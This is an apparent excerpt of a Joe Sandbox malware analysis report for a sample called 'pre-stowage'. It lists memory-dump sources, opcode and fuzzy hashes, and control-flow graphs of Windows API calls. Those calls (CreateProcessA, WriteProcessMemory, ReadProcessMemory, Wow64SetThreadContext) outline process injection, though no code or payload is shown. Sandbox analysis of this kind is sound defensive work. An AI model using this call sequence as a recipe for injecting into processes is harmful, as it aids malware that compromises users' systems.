                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: -2m
                                                                                                        • API String ID: 0-2686427999
                                                                                                        • Opcode ID: 97a852c115e3db15b89e697239405ea4e5552dce139b5d153480918f25513389
                                                                                                        • Instruction ID: 6040990f50a9f27e56ebaeb48024515001cc24ad9c75256895c64d8b0794c703
                                                                                                        • Opcode Fuzzy Hash: 97a852c115e3db15b89e697239405ea4e5552dce139b5d153480918f25513389
                                                                                                        • Instruction Fuzzy Hash: 945137B4E142198FDB08CFEAD5406AEFBF2EB89310F24D46AD819B7254D7345A41CFA4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2217c169736135a03135b58eda0927b6f3a9f65e898c6ef2a3ac063e2598571d
                                                                                                        • Instruction ID: 3bdb55d7e528c2bb6aa519e81a99bbfd3335260ad2dce1ebb6d053bf6edaa943
                                                                                                        • Opcode Fuzzy Hash: 2217c169736135a03135b58eda0927b6f3a9f65e898c6ef2a3ac063e2598571d
                                                                                                        • Instruction Fuzzy Hash: C4B16A70D0A249DFCB18CFA6D58069EFBB2FF8A340F24D46AD415AB265D7359A02CF14
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5bc54a50912edc2fbfc91211f4316a766079f1a37b26b57ebc115f25967c98af
                                                                                                        • Instruction ID: b3f69a2aa88e11f04d0596868f45ac11e8946b59acd9b80a19f9d89629d4b690
                                                                                                        • Opcode Fuzzy Hash: 5bc54a50912edc2fbfc91211f4316a766079f1a37b26b57ebc115f25967c98af
                                                                                                        • Instruction Fuzzy Hash: CAB1F471E06209DFCB18CFA6D58069EFBB2FF99344F20D42AD419AB254DB359A06CF14
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1319047353.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2e20000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 797b83aae74cbe3eb8c58c8e4e60312be7c7b86a8b7493f711131ff9fa13b2f4
                                                                                                        • Instruction ID: 860f4bb1e2a22508cbdd0bfb71f2fb9548d0857e485e68a6a26163076207f1d4
                                                                                                        • Opcode Fuzzy Hash: 797b83aae74cbe3eb8c58c8e4e60312be7c7b86a8b7493f711131ff9fa13b2f4
                                                                                                        • Instruction Fuzzy Hash: FD91B774E01218CFDB58DFA9C894A9DBBB2BF89300F2085A9D419AB365DB319D46CF50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1319047353.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2e20000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: db83c595f7a8ee21cd8dcc6cc566c8c45f78f44c60daf2401f57593ecc04f7e9
                                                                                                        • Instruction ID: 3bea0b490dcb27ae451584c255ce21858940b88db159a7611086aaaeeeba8c8c
                                                                                                        • Opcode Fuzzy Hash: db83c595f7a8ee21cd8dcc6cc566c8c45f78f44c60daf2401f57593ecc04f7e9
                                                                                                        • Instruction Fuzzy Hash: AF91B774E01218CFDB58DFA9C994A9EBBB2FF88300F2095A9D419AB365DB309D45CF50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c2a9b26693e0d56d820e6637a38ba200238e82824ef0626f00c07b0b0bd0993d
                                                                                                        • Instruction ID: 68dcb57b4529b3b995ba10ef9a10cfa9ef0add2d33ab3d38dd0af871b2a508b1
                                                                                                        • Opcode Fuzzy Hash: c2a9b26693e0d56d820e6637a38ba200238e82824ef0626f00c07b0b0bd0993d
                                                                                                        • Instruction Fuzzy Hash: 5B312BB1E006188BDB18CFA7D8446DEFBB7AFC9314F14C06AD809AB264DB355A45CF50

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 295 2e2d551-2e2d5ef GetCurrentProcess 299 2e2d5f1-2e2d5f7 295->299 300 2e2d5f8-2e2d62c GetCurrentThread 295->300 299->300 301 2e2d635-2e2d669 GetCurrentProcess 300->301 302 2e2d62e-2e2d634 300->302 303 2e2d672-2e2d68d call 2e2d738 301->303 304 2e2d66b-2e2d671 301->304 302->301 308 2e2d693-2e2d6c2 GetCurrentThreadId 303->308 304->303 309 2e2d6c4-2e2d6ca 308->309 310 2e2d6cb-2e2d72d 308->310 309->310
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 02E2D5DE
                                                                                                        • GetCurrentThread.KERNEL32 ref: 02E2D61B
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 02E2D658
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 02E2D6B1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1319047353.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2e20000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Current$ProcessThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2063062207-0
                                                                                                        • Opcode ID: 089a1ece4eead0821922fd099abc9cb1158ff40b77a56d2210c57c547c1b32b4
                                                                                                        • Instruction ID: 40ad1b70fcd2cc50108efb7b57da3736e7409261ad95228410fb6316b9761c66
                                                                                                        • Opcode Fuzzy Hash: 089a1ece4eead0821922fd099abc9cb1158ff40b77a56d2210c57c547c1b32b4
                                                                                                        • Instruction Fuzzy Hash: C85175B0D003498FEB14DFA9DA49BAEBBF1EF48314F208499D119A7290CB359949CF65

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 317 2e2d560-2e2d5ef GetCurrentProcess 321 2e2d5f1-2e2d5f7 317->321 322 2e2d5f8-2e2d62c GetCurrentThread 317->322 321->322 323 2e2d635-2e2d669 GetCurrentProcess 322->323 324 2e2d62e-2e2d634 322->324 325 2e2d672-2e2d68d call 2e2d738 323->325 326 2e2d66b-2e2d671 323->326 324->323 330 2e2d693-2e2d6c2 GetCurrentThreadId 325->330 326->325 331 2e2d6c4-2e2d6ca 330->331 332 2e2d6cb-2e2d72d 330->332 331->332
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 02E2D5DE
                                                                                                        • GetCurrentThread.KERNEL32 ref: 02E2D61B
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 02E2D658
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 02E2D6B1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1319047353.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2e20000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Current$ProcessThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2063062207-0
                                                                                                        • Opcode ID: f0b0af7941ab86b638bd3cffbb24d51c9e13515ee6d08b4e1045a5ee251a84cc
                                                                                                        • Instruction ID: 31090bcdb7862b85b795aaa4abb62ff335aa4fea7e05acf956c266ef14a1e9bc
                                                                                                        • Opcode Fuzzy Hash: f0b0af7941ab86b638bd3cffbb24d51c9e13515ee6d08b4e1045a5ee251a84cc
                                                                                                        • Instruction Fuzzy Hash: B05175B0D003098FEB14DFA9DA49BAEBBF1EB88314F20C499D119A7390CB749845CF65

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 726 94aa325-94aa3c5 728 94aa3fe-94aa41e 726->728 729 94aa3c7-94aa3d1 726->729 736 94aa420-94aa42a 728->736 737 94aa457-94aa486 728->737 729->728 730 94aa3d3-94aa3d5 729->730 731 94aa3f8-94aa3fb 730->731 732 94aa3d7-94aa3e1 730->732 731->728 734 94aa3e3 732->734 735 94aa3e5-94aa3f4 732->735 734->735 735->735 738 94aa3f6 735->738 736->737 739 94aa42c-94aa42e 736->739 743 94aa488-94aa492 737->743 744 94aa4bf-94aa579 CreateProcessA 737->744 738->731 741 94aa430-94aa43a 739->741 742 94aa451-94aa454 739->742 745 94aa43e-94aa44d 741->745 746 94aa43c 741->746 742->737 743->744 747 94aa494-94aa496 743->747 757 94aa57b-94aa581 744->757 758 94aa582-94aa608 744->758 745->745 748 94aa44f 745->748 746->745 749 94aa498-94aa4a2 747->749 750 94aa4b9-94aa4bc 747->750 748->742 752 94aa4a6-94aa4b5 749->752 753 94aa4a4 749->753 750->744 752->752 754 94aa4b7 752->754 753->752 754->750 757->758 768 94aa60a-94aa60e 758->768 769 94aa618-94aa61c 758->769 768->769 770 94aa610 768->770 771 94aa61e-94aa622 769->771 772 94aa62c-94aa630 769->772 770->769 771->772 773 94aa624 771->773 774 94aa632-94aa636 772->774 775 94aa640-94aa644 772->775 773->772 774->775 776 94aa638 774->776 777 94aa656-94aa65d 775->777 778 94aa646-94aa64c 775->778 776->775 779 94aa65f-94aa66e 777->779 780 94aa674 777->780 778->777 779->780 782 94aa675 780->782 782->782
                                                                                                        APIs
                                                                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 094AA566
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: 66f1de6ab32aa463aabb7e29759c3459623c673bacc30c4b7e1349d76492c094
                                                                                                        • Instruction ID: 9b61cc5b1cc3cae043dee5dd675ba8e3f90e6fadb5b24f894d0abd1fb146b0ca
                                                                                                        • Opcode Fuzzy Hash: 66f1de6ab32aa463aabb7e29759c3459623c673bacc30c4b7e1349d76492c094
                                                                                                        • Instruction Fuzzy Hash: D0A14C71D003198FEB24CF68CC45BEEBBB2BF58310F14856AE849A7250DB759985CFA1

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 783 94aa330-94aa3c5 785 94aa3fe-94aa41e 783->785 786 94aa3c7-94aa3d1 783->786 793 94aa420-94aa42a 785->793 794 94aa457-94aa486 785->794 786->785 787 94aa3d3-94aa3d5 786->787 788 94aa3f8-94aa3fb 787->788 789 94aa3d7-94aa3e1 787->789 788->785 791 94aa3e3 789->791 792 94aa3e5-94aa3f4 789->792 791->792 792->792 795 94aa3f6 792->795 793->794 796 94aa42c-94aa42e 793->796 800 94aa488-94aa492 794->800 801 94aa4bf-94aa579 CreateProcessA 794->801 795->788 798 94aa430-94aa43a 796->798 799 94aa451-94aa454 796->799 802 94aa43e-94aa44d 798->802 803 94aa43c 798->803 799->794 800->801 804 94aa494-94aa496 800->804 814 94aa57b-94aa581 801->814 815 94aa582-94aa608 801->815 802->802 805 94aa44f 802->805 803->802 806 94aa498-94aa4a2 804->806 807 94aa4b9-94aa4bc 804->807 805->799 809 94aa4a6-94aa4b5 806->809 810 94aa4a4 806->810 807->801 809->809 811 94aa4b7 809->811 810->809 811->807 814->815 825 94aa60a-94aa60e 815->825 826 94aa618-94aa61c 815->826 825->826 827 94aa610 825->827 828 94aa61e-94aa622 826->828 829 94aa62c-94aa630 826->829 827->826 828->829 830 94aa624 828->830 831 94aa632-94aa636 829->831 832 94aa640-94aa644 829->832 830->829 831->832 833 94aa638 831->833 834 94aa656-94aa65d 832->834 835 94aa646-94aa64c 832->835 833->832 836 94aa65f-94aa66e 834->836 837 94aa674 834->837 835->834 836->837 839 94aa675 837->839 839->839
                                                                                                        APIs
                                                                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 094AA566
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: b89519720e396245ad669b986a9bc68d3afa65b390dd8bb6042fe5ad31671773
                                                                                                        • Instruction ID: 028985cc5c2d8870cbed911b817478c9f12e337f73b0cea314b6451595e32a07
                                                                                                        • Opcode Fuzzy Hash: b89519720e396245ad669b986a9bc68d3afa65b390dd8bb6042fe5ad31671773
                                                                                                        • Instruction Fuzzy Hash: D5915C71D003198FEB24CF68CC45BEEBBB2BF58310F14856AE849A7250DB759985CFA1

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 840 2e2b2e0-2e2b2ff 841 2e2b301-2e2b30e call 2e2aca4 840->841 842 2e2b32b-2e2b32f 840->842 847 2e2b310 841->847 848 2e2b324 841->848 844 2e2b343-2e2b384 842->844 845 2e2b331-2e2b33b 842->845 851 2e2b391-2e2b39f 844->851 852 2e2b386-2e2b38e 844->852 845->844 901 2e2b316 call 2e2b588 847->901 902 2e2b316 call 2e2b578 847->902 848->842 853 2e2b3c3-2e2b3c5 851->853 854 2e2b3a1-2e2b3a6 851->854 852->851 859 2e2b3c8-2e2b3cf 853->859 856 2e2b3b1 854->856 857 2e2b3a8-2e2b3af call 2e2acb0 854->857 855 2e2b31c-2e2b31e 855->848 858 2e2b460-2e2b47e 855->858 861 2e2b3b3-2e2b3c1 856->861 857->861 875 2e2b485 858->875 862 2e2b3d1-2e2b3d9 859->862 863 2e2b3dc-2e2b3e3 859->863 861->859 862->863 865 2e2b3f0-2e2b3f9 call 2e2acc0 863->865 866 2e2b3e5-2e2b3ed 863->866 871 2e2b406-2e2b40b 865->871 872 2e2b3fb-2e2b403 865->872 866->865 873 2e2b429-2e2b42d 871->873 874 2e2b40d-2e2b414 871->874 872->871 899 2e2b430 call 2e2b841 873->899 900 2e2b430 call 2e2b868 873->900 874->873 876 2e2b416-2e2b426 call 2e2acd0 call 2e2ace0 874->876 877 2e2b4f1-2e2b520 875->877 878 2e2b487 875->878 876->873 880 2e2b522-2e2b525 877->880 881 2e2b528-2e2b553 GetModuleHandleW 877->881 882 2e2b488-2e2b4d8 878->882 883 2e2b4d9-2e2b4ee 878->883 880->881 886 2e2b555-2e2b55b 881->886 887 2e2b55c-2e2b570 881->887 882->875 882->883 883->877 884 2e2b433-2e2b436 888 2e2b438-2e2b456 884->888 889 2e2b459-2e2b45f 884->889 886->887 888->889 899->884 900->884 901->855 902->855
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 02E2B546
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1319047353.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2e20000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HandleModule
                                                                                                        • String ID:
                                                                                                        • API String ID: 4139908857-0
                                                                                                        • Opcode ID: 081bcaaecad93294155b825365d5bafd8ceadf4bd83f0e3baeffbd532c6528bc
                                                                                                        • Instruction ID: c5ac693a43c841ae3e992ec0d10ecff96ada13b0e613feb26a41cf28c9d0fe4c
                                                                                                        • Opcode Fuzzy Hash: 081bcaaecad93294155b825365d5bafd8ceadf4bd83f0e3baeffbd532c6528bc
                                                                                                        • Instruction Fuzzy Hash: 48815670A00B558FD724CF29D5917AABBF2FF88308F00992DD48ADBA50D775E849CB90

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 903 2e2590d-2e259d9 CreateActCtxA 905 2e259e2-2e25a3c 903->905 906 2e259db-2e259e1 903->906 913 2e25a4b-2e25a4f 905->913 914 2e25a3e-2e25a41 905->914 906->905 915 2e25a60-2e25a90 913->915 916 2e25a51-2e25a5d 913->916 914->913 920 2e25a42-2e25a47 915->920 921 2e25a92-2e25b14 915->921 916->915 920->913
                                                                                                        APIs
                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 02E259C9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1319047353.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2e20000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Create
                                                                                                        • String ID:
                                                                                                        • API String ID: 2289755597-0
                                                                                                        • Opcode ID: ced9aeeb75ac490bce9eb7cea0177e97680953ef40e91c093800135c5b8cf54d
                                                                                                        • Instruction ID: 88493bde66010c94b6817abca3ced9bb43623546e2f257966e5b9637cb3cf530
                                                                                                        • Opcode Fuzzy Hash: ced9aeeb75ac490bce9eb7cea0177e97680953ef40e91c093800135c5b8cf54d
                                                                                                        • Instruction Fuzzy Hash: 594103B0C00729CBEB24CFA9C9857DDBBF1BF48304F60816AD409AB251DB75594ACF90
                                                                                                        APIs
                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 02E259C9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1319047353.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2e20000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Create
                                                                                                        • String ID:
                                                                                                        • API String ID: 2289755597-0
                                                                                                        • Opcode ID: 592a46960ecd428c8e4c74a0fb035fb2b267045a981cc0545765e7d8124e387e
                                                                                                        • Instruction ID: 3014e9f3bbecd6ed34441f062f885105301b3af214deaa68bdcacefe7fd6d361
                                                                                                        • Opcode Fuzzy Hash: 592a46960ecd428c8e4c74a0fb035fb2b267045a981cc0545765e7d8124e387e
                                                                                                        • Instruction Fuzzy Hash: AE4103B0C0072DCBEB24CFA9C9457DEBBB5BF48314F60806AD509AB250DB75594ACF90
                                                                                                        APIs
                                                                                                        • DrawTextExW.USER32(?,?,?,?,?,?), ref: 079500D7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DrawText
                                                                                                        • String ID:
                                                                                                        • API String ID: 2175133113-0
                                                                                                        • Opcode ID: 06bf2a1fef69a8b651c53ec9f31b31159969223e919e837402bda549bc8a24cc
                                                                                                        • Instruction ID: 3f77a18f396f421e4c3446c437d2ef0a1981bab182005afe7fa04555ee1d3f3e
                                                                                                        • Opcode Fuzzy Hash: 06bf2a1fef69a8b651c53ec9f31b31159969223e919e837402bda549bc8a24cc
                                                                                                        • Instruction Fuzzy Hash: E93166B190135A9FCB12CFA9D880ADEBFF4EF09320F14406AE814A7251C7759944CBA1
                                                                                                        APIs
                                                                                                        • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 094AA138
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3559483778-0
                                                                                                        • Opcode ID: cebf55ee283f08bc92c89113f2e5a882c9e37823eaadaab4bb0a0ff489af7ee2
                                                                                                        • Instruction ID: dd001356c6adcad092473ceb226b1f8eb6a45b2f0b3d7f8ae2980a4269633a95
                                                                                                        • Opcode Fuzzy Hash: cebf55ee283f08bc92c89113f2e5a882c9e37823eaadaab4bb0a0ff489af7ee2
                                                                                                        • Instruction Fuzzy Hash: CA211375D003199FDB10CFA9C885BEEBBF5FF48310F50842AE959A7240C7799941CBA4
                                                                                                        APIs
                                                                                                        • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 094AA138
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3559483778-0
                                                                                                        • Opcode ID: 3463a387071972920ea9f4ee6247e0c94a9f9a1886a8808900c988fd53113323
                                                                                                        • Instruction ID: 79f69f2348f05075435e03c3b5f6a237cdf89438c472c0c82e7a7d119892482e
                                                                                                        • Opcode Fuzzy Hash: 3463a387071972920ea9f4ee6247e0c94a9f9a1886a8808900c988fd53113323
                                                                                                        • Instruction Fuzzy Hash: 3E2123B1D003099FDB10DFAAC881BEEBBF5FF48310F50842AE918A7240C7799941CBA4
                                                                                                        APIs
                                                                                                        • DrawTextExW.USER32(?,?,?,?,?,?), ref: 079500D7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DrawText
                                                                                                        • String ID:
                                                                                                        • API String ID: 2175133113-0
                                                                                                        • Opcode ID: d50f928d3ab5a35daa13c0160829f581b06f5481077cb8cf2cbc92d6ed175e76
                                                                                                        • Instruction ID: 8f3608ac9645ad6c3f9ae0f941df79f58ec3f507a362ee21b8cf1c84dbe9a3d5
                                                                                                        • Opcode Fuzzy Hash: d50f928d3ab5a35daa13c0160829f581b06f5481077cb8cf2cbc92d6ed175e76
                                                                                                        • Instruction Fuzzy Hash: CC21C3B5D003199FDB10CFAAD880A9EFBF5FB48324F14842AE919A7210D775A945CFA0
                                                                                                        APIs
                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 094A9B56
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextThreadWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 983334009-0
                                                                                                        • Opcode ID: f502458ed9ffd516edf9ccfd783701c8f658403d48bf3ea327c8af94f11d9c2b
                                                                                                        • Instruction ID: 8f72b3816ba2f85848c74793c37f93bf64ed4531be5f368aa5b6f31c7de736be
                                                                                                        • Opcode Fuzzy Hash: f502458ed9ffd516edf9ccfd783701c8f658403d48bf3ea327c8af94f11d9c2b
                                                                                                        • Instruction Fuzzy Hash: DA213471D003099FDB14DFAAC485BEEBBF4EF48320F50842AE519A7240CB789945CBA4
                                                                                                        APIs
                                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 094AA218
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 1726664587-0
                                                                                                        • Opcode ID: 48b1931a318a9a729ac3c56a9d2cbbf0fff39977e139733b71b9387a1b106441
                                                                                                        • Instruction ID: 7d7ddb2d0c719e46db52f8c181af0cea1aaa2adfefdedfd8a8d9497390470f2f
                                                                                                        • Opcode Fuzzy Hash: 48b1931a318a9a729ac3c56a9d2cbbf0fff39977e139733b71b9387a1b106441
                                                                                                        • Instruction Fuzzy Hash: 45210371C013499FDB10DFAAC885BEEBBF5FF48310F50842AE919A7250C7399945DBA4
                                                                                                        APIs
                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02E2D82F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1319047353.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2e20000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DuplicateHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3793708945-0
                                                                                                        • Opcode ID: 93de5b18da4590222d1b41e354d3a0af4b75294252400db06a608443b34fafa1
                                                                                                        • Instruction ID: b35dedf759abf243a157ee15785ea168abbcb4dfacdc8be1500b22168e2a149b
                                                                                                        • Opcode Fuzzy Hash: 93de5b18da4590222d1b41e354d3a0af4b75294252400db06a608443b34fafa1
                                                                                                        • Instruction Fuzzy Hash: 952112B6D00248DFDB10CFA9D985BEEBBF5FB48310F14806AE918A7210C338A945CF60
                                                                                                        APIs
                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 094A9B56
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextThreadWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 983334009-0
                                                                                                        • Opcode ID: 428b46416e1121809d2bc4523e5230e757cb1cc80cb65246647f56cec2b20162
                                                                                                        • Instruction ID: 7a3ee068995c65277eea0a64ceddb6c81a237606774837294d86b3e73288cc60
                                                                                                        • Opcode Fuzzy Hash: 428b46416e1121809d2bc4523e5230e757cb1cc80cb65246647f56cec2b20162
                                                                                                        • Instruction Fuzzy Hash: 4D210471D003098FDB10DFAAC485BEEBBF5AB48220F54842AD559A7240CB78A945CFA4
                                                                                                        APIs
                                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 094AA218
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 1726664587-0
                                                                                                        • Opcode ID: 8f296ee1beb8ec8e8c147a74af2dbb557f095917cf9cb4c0d10309ff11dedf43
                                                                                                        • Instruction ID: 0e91cca461403ae9b115fd345822f512f77d1593d89ef4b5eef5677e190d46c3
                                                                                                        • Opcode Fuzzy Hash: 8f296ee1beb8ec8e8c147a74af2dbb557f095917cf9cb4c0d10309ff11dedf43
                                                                                                        • Instruction Fuzzy Hash: 57212571C003499FDB10DFAAC881BEEBBF5FF48310F50842AE918A7240C7399941DBA4
                                                                                                        APIs
                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02E2D82F
                                                                                                        Memory Dump Source
